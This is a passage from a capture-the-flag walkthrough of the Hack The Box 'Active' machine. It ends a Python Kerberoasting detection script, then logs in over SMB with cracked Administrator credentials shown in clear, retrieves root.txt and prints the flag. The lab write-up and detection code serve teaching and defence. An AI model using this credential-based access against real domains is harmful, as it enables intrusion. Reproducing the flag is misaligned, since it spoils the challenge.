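    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    if int(ev.get("TicketEncryptionType", "0x0"), 16) != RC4_HMAC:
        return False
    svc = ev.get("ServiceName", "")
    # Computer accounts end in '$' and have long random passwords; krbtgt is a
    # TGT matter. Anything else is a user account whose password is exposed
    # to offline guessing once the ticket is in the attacker's hands.
    return not svc.endswith("$") and svc.lower() not in IGNORED_SERVICES


def detect(lines):
    """Map each requesting principal to the user-account SPNs it pulled with RC4."""
    hits = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_kerberoast_candidate(ev):
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in hits.items()}


if __name__ == "__main__":
    for user, services in detect(SAMPLE_4769_EVENTS).items():
        print(f"{user} requested RC4 service tickets for user accounts: "
              f"{', '.join(services)}")
```

The single hit is also the root cause on this box: a privileged account (Administrator, in Group Policy Creator Owners per the GetUserSPNs output) holds an SPN and a wordlist password, so the same rule is worth pairing with a periodic review of which accounts carry SPNs.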

Connect with smbclient


┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\Administrator%Ticketmaster1968           
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 278043 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
  .                                   D        0  Mon Jul 16 06:14:21 2018
  ..                                  D        0  Mon Jul 16 06:14:21 2018
  AppData                           DHn        0  Mon Jul 16 06:14:15 2018
  Application Data                DHSrn        0  Mon Jul 16 06:14:15 2018
  Contacts                           DR        0  Mon Jul 30 09:50:10 2018
  Cookies                         DHSrn        0  Mon Jul 16 06:14:15 2018
  Desktop                            DR        0  Thu Jan 21 11:49:47 2021
  Documents                          DR        0  Mon Jul 30 09:50:10 2018
  Downloads                          DR        0  Thu Jan 21 11:52:32 2021
  Favorites                          DR        0  Mon Jul 30 09:50:10 2018
  Links                              DR        0  Mon Jul 30 09:50:10 2018
  Local Settings                  DHSrn        0  Mon Jul 16 06:14:15 2018
  Music                              DR        0  Mon Jul 30 09:50:10 2018
  My Documents                    DHSrn        0  Mon Jul 16 06:14:15 2018
  NetHood                         DHSrn        0  Mon Jul 16 06:14:15 2018
  NTUSER.DAT                       AHSn   524288  Sun Aug 27 22:45:57 2023
  ntuser.dat.LOG1                   AHS   262144  Sun Aug 27 23:33:08 2023
  ntuser.dat.LOG2                   AHS        0  Mon Jul 16 06:14:09 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf    AHS    65536  Mon Jul 16 06:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Jul 16 06:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Jul 16 06:14:15 2018
  ntuser.ini                         HS       20  Mon Jul 16 06:14:15 2018
  Pictures                           DR        0  Mon Jul 30 09:50:10 2018
  PrintHood                       DHSrn        0  Mon Jul 16 06:14:15 2018
  Recent                          DHSrn        0  Mon Jul 16 06:14:15 2018
  Saved Games                        DR        0  Mon Jul 30 09:50:10 2018
  Searches                           DR        0  Mon Jul 30 09:50:10 2018
  SendTo                          DHSrn        0  Mon Jul 16 06:14:15 2018
  Start Menu                      DHSrn        0  Mon Jul 16 06:14:15 2018
  Templates                       DHSrn        0  Mon Jul 16 06:14:15 2018
  Videos                             DR        0  Mon Jul 30 09:50:10 2018

                5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Sun Aug 27 22:45:51 2023

                5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\Desktop\> get root.txt 
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\> ^C
                                                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active  active.gnmap  active.htb  active.nmap  active.xml  decode.py  kerbrute  root.txt  users.txt  user.txt
                                                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat root.txt 
b74a82c6fd9308eadeb3be8c43a6e766
                                                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Active]

Root flag b74a82c6fd9308eadeb3be8c43a6e766
